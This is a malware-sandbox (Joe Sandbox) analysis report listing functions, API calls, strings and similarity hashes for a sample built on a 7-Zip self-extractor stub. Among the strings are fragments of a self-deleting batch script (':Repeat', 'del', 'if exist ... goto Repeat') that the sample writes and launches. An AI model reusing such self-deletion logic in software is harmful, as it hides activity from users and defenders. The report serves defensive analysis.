Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698

Function 004024C4 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509

Function 00411388 Relevance: 1.3, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(000000D0), ref: 0041138D

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 08d588780a3caab37cf70573278ad1822b03e6a84bf609910ea5ba04e31b1b9c
Instruction ID: d5b8b2b556814232dc2945b8f7e5995fed121ff751d048b21687cc00dda573f5
Opcode Fuzzy Hash: 08d588780a3caab37cf70573278ad1822b03e6a84bf609910ea5ba04e31b1b9c
Instruction Fuzzy Hash: B4B0123438914504FE5413B208013FB01800F40303F10087B5B02E4DF9FD0884805139

Function 00401B1F Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09

Function 0040F3FC Relevance: 1.3, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040F400

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
Instruction Fuzzy Hash:

Non-executed Functions

Function 004034C1 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 004034E5
SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
_wtol.MSVCRT ref: 0040367F
CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6

Strings

.lnk, xrefs: 004036FF

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
String ID: .lnk
API String ID: 408529070-24824748
Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18

Function 00401F9D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 150stringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
wsprintfW.USER32 ref: 00401FFD
GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
GetLastError.KERNEL32 ref: 00402017
??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
GetLastError.KERNEL32 ref: 0040204C
lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
SetLastError.KERNEL32(00000000), ref: 00402098
lstrlenA.KERNEL32(00413FD0), ref: 004020CC
??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
_wtol.MSVCRT ref: 0040212A
MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A

Strings

\3A, xrefs: 00401FDB
XpA, xrefs: 00401FB4
7zSfxString%d, xrefs: 00401FF7

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
String ID: 7zSfxString%d$XpA$\3A
API String ID: 2117570002-3108448011
Opcode ID: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
Opcode Fuzzy Hash: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18

Function 00401BDF Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
LockResource.KERNEL32(00000000), ref: 00401C41
LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
GetProcAddress.KERNEL32(00000000), ref: 00401C76
wsprintfW.USER32 ref: 00401C95
LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
GetProcAddress.KERNEL32(00000000), ref: 00401CAD

Strings

kernel32, xrefs: 00401C5D, 00401C62, 00401CA9
%04X%c%04X%c, xrefs: 00401C8F
SetProcessPreferredUILanguages, xrefs: 00401C58
SetThreadPreferredUILanguages, xrefs: 00401CA4

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
API String ID: 2639302590-365843014
Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8

Function 00407776 Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON

Download Yara Rule

APIs

wvsprintfW.USER32(?,00000000,?), ref: 0040779A
GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 829399097-0
Opcode ID: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
Opcode Fuzzy Hash: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4

Function 00402B79 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 1862581289-0
Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C

Function 00406D5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
GetWindow.USER32(?,00000005), ref: 00406D8F
GetWindow.USER32(00000000,00000002), ref: 00406DA5

Strings

uxtheme, xrefs: 00406D5E
\EA, xrefs: 00406D98
SetWindowTheme, xrefs: 00406D70

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: Window$AddressLibraryLoadProc
String ID: SetWindowTheme$\EA$uxtheme
API String ID: 324724604-1613512829
Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC

Function 0041022D Relevance: .5, Instructions: 501COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84

Function 0041206B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0

Function 00411F91 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0

Function 0040D72E Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50

Function 00404AFF Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
CloseHandle.KERNEL32(004177C4), ref: 00404C40
SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2

Strings

open, xrefs: 00404C63
if exist ", xrefs: 00404BC7
7ZSfx%03x.cmd, xrefs: 00404B58
:Repeat, xrefs: 00404B92
del ", xrefs: 00404B9F, 00404BA4, 00404BED
" goto Repeat, xrefs: 00404BE0
", xrefs: 00404BB9, 00404BBE, 00404C02

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
